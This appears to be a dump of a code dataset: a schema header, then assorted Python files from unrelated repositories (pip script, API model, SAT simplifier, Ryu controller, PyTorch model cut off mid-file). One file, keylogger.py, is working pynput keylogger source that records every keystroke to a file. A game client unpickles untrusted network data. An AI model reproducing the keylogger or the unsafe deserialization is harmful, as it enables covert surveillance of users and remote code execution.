blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
283
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
41
| license_type
stringclasses 2
values | repo_name
stringlengths 7
96
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 58
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 12.7k
662M
⌀ | star_events_count
int64 0
35.5k
| fork_events_count
int64 0
20.6k
| gha_license_id
stringclasses 11
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 43
values | src_encoding
stringclasses 9
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 7
5.88M
| extension
stringclasses 30
values | content
stringlengths 7
5.88M
| authors
sequencelengths 1
1
| author
stringlengths 0
73
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6753869010cb851c1e63bd77404c56ed1fb3e184 | 00ccbf6a98b237e19a375cb47cba5eca876f567b | /venv/Scripts/pip-script.py | 64d606b8423306a2824c612d6d15a3f5f030cc34 | [] | no_license | emaillalkrishna/23May2019_list_problems1 | 5756a5298c4493a3b6733dd9fcbb0d32808db86a | 00bc0278d5fe4e4d0d35535025e244bb2b41bd48 | refs/heads/master | 2020-05-31T23:02:21.486866 | 2019-06-06T07:00:06 | 2019-06-06T07:00:06 | 190,531,108 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 421 | py | #!"C:\Users\LAL KRISHNA\PycharmProjects\23May2019\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"[email protected]"
] | |
9084390ce15e1db9beffaeeed2599d54bd5bd7ae | 4e8501c2f9ae1676e0bc1cfd22bb2e3c6993fc0d | /keylogger.py | 7c4f886fb6fd049cc4f6d6917ddf20e386d5527f | [] | no_license | svsaurabh/python-starter-1 | 1c5d616d8cefd2bcb6e6a33b7f4062554a4ab13c | 49c29dd41f27ac95a182ec5315ef7bee5feaa62a | refs/heads/master | 2022-12-28T07:59:48.959838 | 2020-10-04T16:51:27 | 2020-10-04T16:51:27 | 300,824,844 | 0 | 1 | null | 2020-10-04T16:51:28 | 2020-10-03T07:41:54 | Python | UTF-8 | Python | false | false | 399 | py | import pynput
print('Running keylogger')
from pynput.keyboard import Key,Listener
import logging
log_dir = r"./"
logging.basicConfig(filename=(log_dir+"keyLog.txt"),level=logging.INFO,format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(str(key))
if(str(key) == '\'`\''):
print("exit")
exit()
with Listener(on_press=on_press) as listener:
listener.join() | [
"[email protected]"
] | |
8fd6dbb11687301fb31010e9818688c5aec48162 | 1c91ea9dd939c26134d95ce0c80c450ee958de1b | /scripts/divide_sub_images_train.py | 8cc63952de98d8b2f5839b34469e48443fe92db8 | [] | no_license | Scallions/ClassSR_paddle | ed73b1b420ad9b129ba9c3a050fe7e2bb2ba5a80 | 6f7648c7507f423e54455482f85d363f6b5ed9e7 | refs/heads/main | 2023-08-31T01:44:04.059381 | 2021-09-29T08:42:05 | 2021-09-29T08:42:05 | 399,377,609 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,704 | py |
import os.path as osp
import os
import numpy as np
import shutil
#divide training data
LR_folder="dataset/DIV2K_scale_sub/LR"
GT_folder="dataset/DIV2K_scale_sub/GT"
save_list=["dataset/DIV2K_scale_sub_psnr_LR_class3",
"dataset/DIV2K_scale_sub_psnr_LR_class2",
"dataset/DIV2K_scale_sub_psnr_LR_class1",
"dataset/DIV2K_scale_sub_psnr_GT_class3",
"dataset/DIV2K_scale_sub_psnr_GT_class2",
"dataset/DIV2K_scale_sub_psnr_GT_class1"]
for i in save_list:
if os.path.exists(i):
pass
else:
os.makedirs(i)
threshold=[27.16882,35.149761]
#f1 = open("/data0/xtkong/ClassSR-github/codes/data_scripts/divide_val.log")
f1 = open("scripts/divide_train.log")
a1 = f1.readlines()
index=0
for i in a1:
index+=1
print(index)
if ('- PSNR:' in i and 'INFO:' in i) and ('results' not in i):
psnr=float(i.split('PSNR: ')[1].split(' dB')[0])
filename=i.split('INFO: ')[1].split(' ')[0]
filename=filename+".png"
print(filename,psnr)
if psnr < threshold[0]:
shutil.copy(osp.join(LR_folder, filename), osp.join(save_list[0], filename))
shutil.copy(osp.join(GT_folder, filename), osp.join(save_list[3], filename))
if psnr >= threshold[0] and psnr < threshold[1]:
shutil.copy(osp.join(LR_folder, filename), osp.join(save_list[1], filename))
shutil.copy(osp.join(GT_folder, filename), osp.join(save_list[4], filename))
if psnr >= threshold[1]:
shutil.copy(osp.join(LR_folder, filename), osp.join(save_list[2], filename))
shutil.copy(osp.join(GT_folder, filename), osp.join(save_list[5], filename))
f1.close()
| [
"[email protected]"
] | |
d39191f4401b7166c7a514ce37a1c1855eada830 | 32ff89ba0cade19a291557c7f002613632a35fc9 | /Lektion_1_Einfuehrung_in_Python/1_5_Eingabe_Ausgabe.py | 2917781b3104a6d5b59b34182417badb3b2f225b | [] | no_license | iubh/DLMDWPMP01 | 749f3fad456e97fd6355b0f4758ecc69b194c0ba | 520eb91111f516feb4532d2001569000fe7be9b8 | refs/heads/main | 2023-04-30T02:51:09.897270 | 2021-04-28T18:38:01 | 2021-04-28T18:38:01 | 358,973,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,570 | py | # IU - Internationale Hochschule
# Programmierung mit Python
# Course Code: DLMDWPMP01
# Eingabe / Ausgabe
#%%
# Eine Tastatur-Eingabe abfragen
user_input = input("Wie heißt du?")
#%%
# Die Eingabe ausgeben
print("Hallo, {}!".format(user_input))
# console output: Hallo, Christian!
#%%
# Datei im Lese-Modus öffnen
my_file = open("myTextData.txt", "r")
# Inhalt der Datei lesen und als Objekt speichern
my_file_content = my_file.read()
# Datei schließen
my_file.close()
# in Objekt gespeicherten Inhalt ausgeben lassen
print(my_file_content)
# console output:
# Strange women lying in ponds,
# distributing swords,
# is no basis for a
# system of government!
#%%
# Datei sicher öffnen
with open("myTextData.txt", "r") as my_file:
# Inhalt der Datei lesen und als Objekt speichern
my_file_content = my_file.read()
#%%
with open("myTextData.txt", "r") as my_file:
# über jede Zeile der Datei iterieren
for cur_line in my_file:
print("This line: {}".format(cur_line))
# console output:
# This line: Strange women lying in ponds,
# This line: distributing swords,
# This line: is no basis for a
# This line: system of government!
#%%
with open("myTextData.txt", "r") as my_file:
my_line = my_file.readline()
print(my_line)
# console output: Strange women lying in ponds,
#%%
with open("myTextData.txt", "r") as my_file:
my_lines = my_file.readlines()
print(my_lines[3])
# console output: system of government!
#%%
with open("myNewTextData.txt", "w") as my_file:
my_file.write("blessed are the cheesemakers.") | [
"[email protected]"
] | |
69c617a2bab0935fa411eece5a5fb0c52ac0adb2 | 95ad751d88996ab5270c36614d5a0ff2296cf94f | /flask_portfolio/server.py | 2cf20ab15059989628be847f5543fbbf2d8f8162 | [] | no_license | Ash25x/PythonClass | a8a738fdac36365eb19749b5cda3b26ed92e6e29 | bd4351bdcaa69b88e92d9a683bf8f10683e7292f | refs/heads/master | 2021-08-08T22:39:01.575813 | 2017-11-11T13:42:12 | 2017-11-11T13:42:12 | 102,967,067 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 210 | py | # from flask import Flask, render_template, request
from portfolio import app
# app = Flask('portfolio')
#
# from . import views
if __name__ == '__main__':
app.run(debug =True, host='localhost',port=5555)
| [
"[email protected]"
] | |
24b2966bd1b8fd90c90bf5ecbc25ffa51ea5a07c | e739dd9f35856cddabcf486080c189764cb98b4a | /simplification.py | b5012eab0e905c0ea56ef95b6ebf66fb746c849e | [] | no_license | sebkeil/KR-Project01-Group02 | e8a6e7c40fa40852ac360f511dbc0e9a52fb89b4 | a2dd69909894e94b0ccef79e3834ebdaa4523260 | refs/heads/master | 2022-12-28T04:46:54.108524 | 2020-09-23T13:23:09 | 2020-09-23T13:23:09 | 293,752,390 | 0 | 0 | null | 2020-09-22T08:20:58 | 2020-09-08T08:44:03 | Python | UTF-8 | Python | false | false | 3,191 | py | def tautology(clauses):
for literals in clauses:
for lit in literals:
if -lit in literals:
clauses.remove(literals)
return clauses
return clauses
def pure_literals(clauses, varbs, assigns):
for literals in clauses:
for lit in literals:
if -lit not in varbs and lit not in assigns:
assigns.append(lit)
return assigns
def unit_clauses(clauses, assigns, validity_check):
varbs = []
for literals in clauses:
if len(literals) == 1:
item = literals[0]
varbs.append(item)
for items in varbs:
if -items in varbs or -items in assigns:
validity_check = False
return validity_check
def true_clauses(clauses, assigns, validity_check):
if validity_check:
rem_clauses = []
for literals in clauses:
if any(item in literals for item in assigns):
rem_clauses.append(literals)
for rc in rem_clauses:
clauses.remove(rc)
return clauses
def val_check(clauses, validity_check, assigns):
varbs = []
for literals in clauses:
#check for empty clauses
if not literals:
validity_check = False
# check for unit literals
if len(literals) == 1:
varbs.append(literals[0])
# if pos and neg variables occur together, then false
for items in varbs:
if -items in varbs or -items in assigns:
validity_check = False
return validity_check
def shorten_clause(clauses, assigns, validity_check):
if validity_check:
for literals in clauses:
keep_lits = []
if len(literals) > 1:
for lit in literals:
if -lit not in assigns:
keep_lits.append(lit)
if keep_lits:
new_clause = [liters for liters in keep_lits]
else:
new_clause = []
clauses[clauses.index(literals)] = new_clause
return clauses
def unit_propagation(variables, clauses, assmts, units):
clauses.sort(key=len)
n = 0
while n < len(clauses) and len(clauses[n]) == 1:
literals = clauses[n]
if literals[0] not in assmts and -literals[0] not in assmts:
assmts.append(literals[0])
units.append(literals[0])
n += 1
return variables, assmts
# function to simplify CNF with assignments and rules
def simplify(clauses, assigns, validity_check):
# assign values to pure literals, can be left out: computationally expensive
#assigns = pure_literals(clauses, varb, assigns)
# shorten clauses
clauses1 = shorten_clause(clauses, assigns, validity_check)
if validity_check:
validity_check = val_check(clauses1, validity_check, assigns)
# remove true clauses
clauses2 = true_clauses(clauses1, assigns, validity_check)
validity_check = val_check(clauses, validity_check, assigns)
return clauses2, assigns, validity_check | [
"[email protected]"
] | |
402d7a1852a0d8a57dc65c63a3f34db7c6ca1971 | b2a6a8733f588d503e45ad40cfa2080566d1ccf5 | /0x03-python-data_structures/1-element_at.py | 8f497c59322f19e6d0dee0f2531c52f578530d68 | [] | no_license | andresvanegas19/holbertonschool-higher_level_programming | 9cd0f83722623ca08c6b4e3aa94975363b569183 | aa967a51183c3c8b9c9b27b47199c70fd6241485 | refs/heads/master | 2022-12-22T18:44:17.839861 | 2020-09-25T04:54:18 | 2020-09-25T04:54:18 | 259,396,114 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 156 | py | #!/usr/bin/python3
def element_at(my_list, idx):
if ((idx < 0) or (idx >= len(my_list))):
return (None)
else:
return (my_list[idx])
| [
"[email protected]"
] | |
e7eeffd8a0307e45d5b6830ad3f4623fcb990224 | 98b4aeadab444eaf6f0d5b469c199e6d24a52f7f | /step10/10870.py | 795ad4473e8f0f5778763c6555ea8321bc472a36 | [] | no_license | kwr0113/BOJ_Python | 7a9dc050bb3bb42ae2b03671c5d6fa76cc0d6d99 | 27bafdaafc44115f55f0b058829cb36b8c79469a | refs/heads/master | 2023-06-10T23:22:20.639613 | 2021-06-25T07:25:53 | 2021-06-25T07:25:53 | 328,057,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | # 10870.py
def fibo(x):
if x == 0:
return 0
elif x == 1:
return 1
else:
return fibo(x-1) + fibo(x-2)
x = int(input())
print(fibo(x)) | [
"[email protected]"
] | |
20379467d53a3638ad96f609d78ae89ee19c7efe | cfefcd99016a908df2584896845406942097671d | /python/nucoro_api/model/asset_category.py | ccee0ee7f9cbf74b20befbf1984419fa32be2c0a | [] | no_license | tomasgarzon/vigilant-guacamole | 982a8c7cb0a8193bb3409014b447ad8a70e6eb36 | bde73674cf0461e2fcdfce5074bf9d93a47227f7 | refs/heads/main | 2023-08-17T01:51:27.168440 | 2021-09-01T11:23:46 | 2021-09-01T11:23:46 | 398,827,144 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,971 | py | """
Nucoro API
No description # noqa: E501
The version of the OpenAPI document: 4.175.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from nucoro_api.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from nucoro_api.exceptions import ApiAttributeError
class AssetCategory(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
('name',): {
'max_length': 150,
},
('code',): {
'max_length': 50,
},
('order',): {
'inclusive_maximum': 32767,
'inclusive_minimum': 0,
},
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'uuid': (str,), # noqa: E501
'name': (str,), # noqa: E501
'code': (str,), # noqa: E501
'order': (int,), # noqa: E501
'type': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'uuid': 'uuid', # noqa: E501
'name': 'name', # noqa: E501
'code': 'code', # noqa: E501
'order': 'order', # noqa: E501
'type': 'type', # noqa: E501
}
read_only_vars = {
'uuid', # noqa: E501
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, uuid, name, code, order, type, *args, **kwargs): # noqa: E501
"""AssetCategory - a model defined in OpenAPI
Args:
uuid (str):
name (str):
code (str):
order (int):
type (str):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.uuid = uuid
self.name = name
self.code = code
self.order = order
self.type = type
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, name, code, order, type, *args, **kwargs): # noqa: E501
"""AssetCategory - a model defined in OpenAPI
name (str):
code (str):
order (int):
type (str):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.name = name
self.code = code
self.order = order
self.type = type
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| [
"[email protected]"
] | |
ee61c291d36a5a578ed0572b97be434e2acab471 | 9baa52b6204e2c3fccb71679178442bca0a90bbe | /client/src/gamelib/client.py | 7b631927b4135f5ad33fc5f90e9247b30437f39b | [] | no_license | brunez/m-reborn | bec34f57b4e229a5733bbd1db2fe543021e8719a | 3b0f56b03190e714fdc55d420ca0f0630fa454d1 | refs/heads/master | 2023-02-08T18:20:15.125457 | 2023-01-30T19:40:07 | 2023-01-30T19:40:07 | 52,682,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,342 | py |
import socket
import pickle
import network
import game
from ctypes import ARRAY
class Client:
def __init__(self, server_ip, server_port, menu, host=False):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.setblocking(0)
# server_ip = "138.100.154.236"
self.serv_addr = server_ip, server_port
self.menu = menu
self.isHost = host
self.game = None
def close(self):
self.socket.close()
def send(self, data):
# print "Sending ", data
pickled = pickle.dumps(data)
self.socket.sendto(pickled, self.serv_addr)
# print "Sent" + data + " to " + str(self.serv_addr)
def set_game(self, game):
self.game = game
#TODO BIG TODO Use split for string analysis
def receive(self):
while True:
try:
data, addr = self.socket.recvfrom(4096)
# print "Client Got " , str(data) ," of type " , str(type(data))
data = pickle.loads(data)
#Lists we can receive:
# players: A list of network.Avatars representing the players
# game_state: A list of objects?? sprites?? representing the game state
if isinstance(data, list):
if data[0] == "players":
data = data[1:]
# print "Received players: ", data
self.menu.set_game_info(data)
#The first sync messages can get here before the client
#is done constructing, so we check if the game is assigned, just in case
elif data[0] == "sync" and self.game != None:
self.game.synchronize(data)
elif data[0] == 'ply_sync' and self.game != None:
self.game.synchronize_players(data)
if data[:2] == "id":
if not self.isHost:
self.menu.set_id(int(data[3]))
self.menu.set_connected(True)
if data[:5] == "start":
mode = int(data[6:7])
level_name = data[8:]
self.menu.set_mode(mode)
self.menu.set_ready(True)
self.menu.set_level_name(level_name)
if data[:3] == "act":
#action_id = int(data[4])
self.game.pay_heed(data)
elif data[:3] == "hit":
data = data[data.index(":")+1:]
source_id = int(data[:data.index(":")])
data = data[data.index(":")+1:]
side = int(data[:data.index(":")])
data = data[data.index(":")+1:]
target_id = int(data)
self.game.note_collision(source_id, side, target_id)
elif data[:4] == "lost":
self.game.lose(data[5:])
elif data[:4] == "stop":
self.game.notify_server_stopped()
except socket.error:
break
| [
"[email protected]"
] | |
9deb4d50553b21ded4b05d6b3cb6d8011f610422 | bf44694f814ab2ed3d930cc9785cda8cb8e363ef | /mswitching-hub.py | ee547cb37ec71d202e64f1c9132135a41bd3eac3 | [] | no_license | jakio6/ryu-multicast-try | 4c5e7ff1df5aac81cc8559a360fa62a7ed61e4ee | 37d72cf754fe7af3ee6565f2f2a67821f995f713 | refs/heads/master | 2023-03-19T01:28:43.315727 | 2021-03-18T14:42:51 | 2021-03-18T14:42:51 | 318,971,301 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,595 | py | # clone ryu book里的switching hub. 熟悉一下, 尽量少看原来代码吧.
import logging
# 首先, 需要哪些库? 不看具体的代码. 不看ryu book. 当然OpenFlow那部分可以当作参
# 考.
from ryu.base import app_manager
# ryu.controller.controller : the main component of OpenFlow controller.
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER # dispatcher
from ryu.controller.handler import CONFIG_DISPATCHER
from ryu.controller.handler import set_ev_cls # listing for given event
from ryu.ofproto import ofproto_v1_3 # open flow protocol
# from ryu.topology import event, switches
# from ryu.topology.api import get_switch, get_link
from igmplib import IgmpLib
from igmplib import EventPacketIn
from ryu.ofproto import inet
from ryu.ofproto import ether
import ryu.app.ofctl.api as ofctl_api
from json import load
LOG = logging.getLogger(__name__)
class L2Switch(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
_CONTEXTS = {
'migmplib': IgmpLib,
}
def __init__(self, *args, **kwargs):
super(L2Switch, self).__init__(*args, **kwargs);
# self.topo = *kwargs['topology']
# self.topo = {
# 1: {1: 2, 2: 3},
# 2: {3: 1, 1: 'host', 2: 'host'},
# 3: {3: 1, 1: 'host', 2: 'host'},
# }
topo = {}
with open('topo.json') as f:
_topo = load(f)
assert _topo
for k, v in _topo.items():
sw = topo.setdefault(int(k), {})
for kk, vv in v.items():
sw.setdefault(int(kk), vv)
self._igmp = kwargs['migmplib']
self._dpid_to_datapath = {}
self._igmp.set_topology(topo)
def manual_flood(self, dp, data):
"""
send a message to all ports of a datapath
"""
ofp = dp.ofproto
ofp_parser = dp.ofproto_parser
buffer_id = ofp.OFP_NO_BUFFER # None
in_port = ofp.OFPP_CONTROLLER # None
# flooding
actions = [ofp_parser.OFPActionOutput(ofp.OFPP_FLOOD)]
req = ofp_parser.OFPPacketOut(dp, buffer_id, in_port, actions, data)
dp.send_msg(req)
@set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
def switch_features_handler(self, ev):
datapath = ev.msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
LOG.info("Switch feather: %d", datapath.id)
# install the table-miss flow entry.
match = parser.OFPMatch()
actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
ofproto.OFPCML_NO_BUFFER)]
self.add_flow(datapath, 0, match, actions)
def add_flow(self, datapath, priority, match, actions):
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
# construct flow_mod message and send it.
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
actions)]
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst)
datapath.send_msg(mod)
@set_ev_cls(EventPacketIn)
def packet_in_handler(self, ev):
msg = ev.msg # message carried with event.. see related pagse for its content
datapath = msg.datapath
# reason = msg.reason
data = msg.data
LOG.debug('packet in')
# self.manual_flood(datapath, data)
| [
"[email protected]"
] | |
e381eb7c7c4e70aa1df7df9890dae40a64d7d34a | d1955b0a26a2c1b26e7f74ed0f15c62a9aad0895 | /ConjunctionOrder.py | edb403ff0dac496e0bbc11f8dc6815d23f68c1d0 | [] | no_license | kimu3-slime/Linguistics | 4b036c1f3f9f83fde3c66030ea4a802ea4a0235f | a803addf426b30dab36a1c7f309f410bbfbe1315 | refs/heads/master | 2020-05-16T21:27:19.176611 | 2015-01-06T09:03:12 | 2015-01-06T09:03:12 | 28,481,358 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,526 | py | # coding: UTF-8
import nltk #言語処理の準備
from nltk.book import *
from nltk.corpus import brown
import itertools
conj= ['after', 'although' ,'as', 'because', 'before' , 'if', 'since', 'so', 'than', 'though', 'unless', 'until', 'when', 'whenever', 'where', 'whereas', 'wherever', 'while'] #抽出する接続詞の設定
text = brown.words() #Brownコーパスを使う
tcon = [w.lower() for w in text if w.lower() in conj] #Brownコーパスから接続詞だけを抽出
fdist_tcon = FreqDist(tcon) #接続詞の度数分布
Conj = fdist_tcon.keys()[:4] #上位4つの接続詞とその頻度データ
def bimake(tuple): #接続詞組(B,C)があったときに、[[B,C],[C,B]]というデータをつくる
return (tuple,tuple[::-1])
def TCon(con): #接続詞組のデータを度数に変換する
tcon = [w.lower() for w in text if w in Conj]
fdist = FreqDist(bigrams(tcon)) #接続詞組の度数分布
print fdist[con] #度数の表示
return fdist[con] #度数を返す
def a(b,c): #頻度b,cから計算できる、順序評価値a(b,c)の定義を与える
print 100.0*abs(b - c) / (b + c)
def d(bituple): #[[B,C],[C,B]]というデータから頻度b,cを取り出し、順序評価値を計算させる
a(TCon(bituple[0]),TCon(bituple[1]))
for v in [w for w in itertools.combinations(Conj,2)]: #Conjから任意に接続詞組を取り出す
print v, #接続詞組B,Cの表示
d(bimake(v)) #[B,C]の頻度、[C,B]の頻度、接続組の順序評価値aの表示 | [
"[email protected]"
] | |
62a22725e183f5e8563dde5f9d0142120188d1a0 | 797960bfb316c91825a8e8493a27f1121e2e895d | /FPN_model.py | 5afa440e051c3e40ca5cc3ff9c03cbf5b5c12a55 | [] | no_license | divyakraman/Pyramid-DRN-A-case-study-on-category-wise-semantic-segmentation-of-real-urban-scenes | 874c2cad24d9043f7d416f7673f11ac5cbd6a0bc | d6a5367d2be7eb87a0b86bda48222dadb56148b8 | refs/heads/master | 2020-07-05T04:38:32.133210 | 2020-01-26T14:26:10 | 2020-01-26T14:26:10 | 202,524,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,182 | py | import numpy as np
import torch
import torchvision
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import math
from GCN_BR import GCN,BR
#import matplotlib.pyplot as plt
#import scipy.misc as smisc
#import random
class FPN(nn.Module):
def __init__(self):
super(FPN, self).__init__()
self.conv1 = nn.Conv2d(in_channels=3,out_channels=32,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv4 = nn.Conv2d(in_channels=32,out_channels=32,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.down1 = nn.Conv2d(in_channels=32,out_channels=32,kernel_size=4,stride=2,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv1_bn = nn.BatchNorm2d(32)
self.conv2 = nn.Conv2d(in_channels=32,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv5 = nn.Conv2d(in_channels=64,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.down2 = nn.Conv2d(in_channels=64,out_channels=64,kernel_size=4,stride=2,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv2_bn = nn.BatchNorm2d(64)
self.conv3 = nn.Conv2d(in_channels=64,out_channels=128,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv6 = nn.Conv2d(in_channels=128,out_channels=128,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.down3 = nn.Conv2d(in_channels=128,out_channels=128,kernel_size=4,stride=2,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv3_bn = nn.BatchNorm2d(128)
self.lateral3 = nn.Conv2d(in_channels=128,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.lateral2 = nn.Conv2d(in_channels=64,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.lateral1 = nn.Conv2d(in_channels=32,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.upsample3 = nn.Upsample(scale_factor=2,mode='bilinear',align_corners=True)
self.upsample2 = nn.Upsample(scale_factor=2,mode='bilinear',align_corners=True)
